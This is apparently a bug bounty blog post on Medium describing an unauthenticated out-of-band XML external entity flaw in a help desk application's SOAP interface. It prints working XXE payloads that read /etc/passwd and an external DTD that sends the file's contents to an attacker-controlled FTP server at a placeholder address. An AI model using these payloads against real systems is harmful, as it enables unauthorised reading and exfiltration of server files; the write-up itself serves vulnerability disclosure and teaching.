Nik srivastava
Oct 24, 2018 · 2 min read

SOAP- Based Unauthenticated Out-of-Band XML External Entity (OOB-XXE) in a Help Desk Software

I omitted the application name as it was private program.

While registering for an application, i have got wsdl file such as:

I have used wsdler burp extension to parse the wsdl file as shown in below image:

Image for post
Image for post

Now, I sent a request to repeater and started fuzzing it for XXE. Firstly, i have started with Classic XXE payloads such as:

<?xml version=”1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY file SYSTEM “file:///etc/passwd”>]><data>&file;</data>
Image for post
Image for post
for file /etc/passwd
Image for post
Image for post
for file /etc/shadow

As you can see, from above two responses we can confirm the existence of vulnerability, but we can only enumerate file from server.

In order to extract the content of file, we need to emulate FTP-server (or if you had used a different one, please comment:)

I setup an xxe.dtd file on my server with following payload:

<!ENTITY % d SYSTEM “file:///etc/passwd”><!ENTITY % c “<!ENTITY rrr SYSTEM ‘ftp://x.x.x.x:2121/%d;'>">

Download and run the emulated ftp server from following link(Make sure about Port to listen):

Now, we need to enter the following XXE payload in vulnerable request such as:

<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>
Image for post
Image for post
Final XXE payload

As soon as you run the vulnerable request, you will start receiving content of /etc/passwd file on emulated FTP server as shown in below screenshot:

Image for post
Image for post

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store